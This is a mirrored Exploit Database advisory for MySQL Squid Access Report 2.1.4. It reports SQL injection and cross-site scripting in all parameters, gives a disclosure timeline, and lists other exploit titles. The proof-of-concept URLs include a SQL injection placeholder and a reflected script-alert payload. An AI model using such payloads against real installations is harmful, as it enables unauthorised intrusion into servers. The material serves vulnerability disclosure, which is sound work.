MySQL Squid Access Report 2.1.4 – SQL Injection / Cross-Site Scripting

Exploit Database
76 阅读

作者： Keerati T.

日期： 2018-04-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44483/

# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux

1. Description
SQL injection and Cross site script vulnerabilities are found on ALL
parameter of MySAR.

2. Proof of Concept
FOR EXAMPLE
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
-XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
"><script>alert(1)</script>

3. Timeline
8-3-2018 - Report on their Github. (
https://github.com/coffnix/mysar-ng/issues/12)
-- 1 month later, no any response from vendor. --
14-4-2018 - Public.

last Exploits
MySQL Squid Access Report 2.1.4 – SQL Injection / Cross-Site Scripting的更多信息

Maian Uploader 4.0 – Arbitrary File Upload：
IceWarp 10.4.4 – Local File Inclusion：
Cisco EPC 3925 – Multiple Vulnerabilities：
Joomla! Component J-CruisePortal 6.0.4 – SQL Injection：
Nuke Evolution Xtreme 2.0 – Local File Inclusion / SQL Injection：
NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection：
JLex GuestBook 1.6.4 – Reflected XSS：
CHIYU TCP/IP Converter devices – CRLF injection：